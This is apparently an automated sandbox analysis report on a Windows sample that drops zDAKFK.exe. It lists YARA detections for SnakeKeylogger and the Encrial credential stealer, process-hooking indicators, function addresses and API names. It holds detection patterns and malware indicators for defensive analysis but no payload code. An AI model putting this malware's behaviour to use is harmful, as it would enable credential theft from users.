                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4e904d8.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking | Author: ditekSHen
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4ed36f8.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4ed36f8.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking | Author: ditekSHen
                Source: 12.2.zDAKFK.exe.40f44c8.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
                Source: 12.2.zDAKFK.exe.40f44c8.1.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
                Source: 12.2.zDAKFK.exe.40f44c8.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking | Author: ditekSHen
                Source: 12.2.zDAKFK.exe.40f44c8.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking | Author: ditekSHen
                Source: 12.2.zDAKFK.exe.40b12a8.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
                Source: 12.2.zDAKFK.exe.40b12a8.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
                Source: 12.2.zDAKFK.exe.40b12a8.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking | Author: ditekSHen
                Source: 0000000B.00000002.1988112814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
                Source: 0000000C.00000002.1769470326.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
                Source: 00000000.00000002.1727563021.0000000004E90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
                Source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe PID: 6992, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
                Source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe PID: 7176, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
                Source: Process Memory Space: zDAKFK.exe PID: 7248, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Process Stats: CPU usage > 49%
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Code function: 0_2_017842BC | 0_2_017842BC
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Code function: 0_2_0178E1AC | 0_2_0178E1AC
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Code function: 0_2_017875E3 | 0_2_017875E3
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Code function: 0_2_05770228 | 0_2_05770228
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Code function: 0_2_05770218 | 0_2_05770218
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Code function: 0_2_0577ED80 | 0_2_0577ED80
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Code function: 0_2_07B51310 | 0_2_07B51310
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Code function: 0_2_07B54100 | 0_2_07B54100
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Code function: 0_2_07B50040 | 0_2_07B50040
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Code function: 0_2_07B536C0 | 0_2_07B536C0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Code function: 0_2_07B54390 | 0_2_07B54390
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Code function: 0_2_07B5438A | 0_2_07B5438A
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Code function: 0_2_07B5B3C0 | 0_2_07B5B3C0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Code function: 0_2_07B51300 | 0_2_07B51300
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Code function: 0_2_07B540F0 | 0_2_07B540F0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Code function: 0_2_07B5003A | 0_2_07B5003A
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Code function: 0_2_07B5AF88 | 0_2_07B5AF88
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Code function: 0_2_07B57F68 | 0_2_07B57F68
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Code function: 0_2_07B5CD58 | 0_2_07B5CD58
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Code function: 0_2_07B5AB50 | 0_2_07B5AB50
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Code function: 0_2_07B5C920 | 0_2_07B5C920
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Code function: 0_2_093B78E8 | 0_2_093B78E8
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Code function: 0_2_093B8160 | 0_2_093B8160
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Code function: 0_2_0F0323A8 | 0_2_0F0323A8
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeCode function: 11_2_02AC3E0911_2_02AC3E09
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeCode function: 11_2_02AC3A9111_2_02AC3A91
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeCode function: 11_2_02AC29EC11_2_02AC29EC
Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Code function: 12_2_009C42BC
Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Code function: 12_2_009CE1AC
Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Code function: 12_2_009C42B0
Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Code function: 12_2_009C75E2
Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Code function: 12_2_050936C0
Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Code function: 12_2_05094100
Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Code function: 12_2_0509003B
Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Code function: 12_2_05090040
Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Code function: 12_2_050940F0
Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Code function: 12_2_05091300
Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Code function: 12_2_05091310
Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Code function: 12_2_05094381
Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Code function: 12_2_05094390
Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Code function: 12_2_0509B3C0
Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Code function: 12_2_0509CD58
Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Code function: 12_2_05097F77
Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Code function: 12_2_0509AF88
Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Code function: 12_2_0509C920
Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Code function: 12_2_0509AB50
Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Code function: 12_2_0E2616A0
Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Code function: 16_2_00D9A088
Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Code function: 16_2_00D9C147
Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Code function: 16_2_00D9D2C8
Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Code function: 16_2_00D95362
Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Code function: 16_2_00D9D599
Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Code function: 16_2_00D9C788
Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Code function: 16_2_00D969A0
Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Code function: 16_2_00D9EAA8
Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Code function: 16_2_00D9CA58
Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Code function: 16_2_00D9FBE6
Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Code function: 16_2_00D9CD28
Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Code function: 16_2_00D93E09
Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Code function: 16_2_00D96FC8
Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Code function: 16_2_00D9CFF7
Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Code function: 16_2_00D939ED
Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Code function: 16_2_00D929EC
Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Code function: 16_2_00D9EA9B
Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Code function: 16_2_00D93AA1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7176 -s 1520
Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000000.1670060735.0000000000E32000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamePHCUmkeAjDPT.exe0 vs SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe
Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1725042592.0000000003532000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRemington.exe4 vs SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe
Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1727563021.0000000004B1E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe
Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1723863985.00000000014AE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe
Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1734225665.000000000B9A0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe
Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1727563021.0000000004E90000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRemington.exe4 vs SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe
Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988112814.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRemington.exe4 vs SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe
Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Binary or memory string: OriginalFilenamePHCUmkeAjDPT.exe0 vs SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe
Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4ed36f8.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4ed36f8.3.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4ed36f8.3.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4e904d8.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4e904d8.2.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4e904d8.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 11.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.zDAKFK.exe.40b12a8.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 11.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.zDAKFK.exe.40b12a8.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.zDAKFK.exe.40b12a8.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4e904d8.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 11.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4e904d8.2.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4ed36f8.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.zDAKFK.exe.40f44c8.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.zDAKFK.exe.40f44c8.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4e904d8.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4ed36f8.3.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4ed36f8.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.zDAKFK.exe.40f44c8.1.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.zDAKFK.exe.40f44c8.1.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.zDAKFK.exe.40f44c8.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.zDAKFK.exe.40f44c8.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.zDAKFK.exe.40b12a8.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.zDAKFK.exe.40b12a8.0.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.zDAKFK.exe.40b12a8.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0000000B.00000002.1988112814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000C.00000002.1769470326.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1727563021.0000000004E90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe PID: 6992, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe PID: 7176, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: zDAKFK.exe PID: 7248, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: zDAKFK.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4e904d8.2.raw.unpack, ---.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4e904d8.2.raw.unpack, ---.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4e904d8.2.raw.unpack, ---.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4ed36f8.3.raw.unpack, ---.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4ed36f8.3.raw.unpack, ---.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4ed36f8.3.raw.unpack, ---.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 12.2.zDAKFK.exe.40f44c8.1.raw.unpack, ---.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 12.2.zDAKFK.exe.40f44c8.1.raw.unpack, ---.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 12.2.zDAKFK.exe.40f44c8.1.raw.unpack, ---.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4d489d8.0.raw.unpack, DcHUM92j2w5Tv1Pf7E.cs | Security API names: _0020.SetAccessControl
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4d489d8.0.raw.unpack, DcHUM92j2w5Tv1Pf7E.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4d489d8.0.raw.unpack, DcHUM92j2w5Tv1Pf7E.cs | Security API names: _0020.AddAccessRule
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.b9a0000.6.raw.unpack, DcHUM92j2w5Tv1Pf7E.cs | Security API names: _0020.SetAccessControl
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.b9a0000.6.raw.unpack, DcHUM92j2w5Tv1Pf7E.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
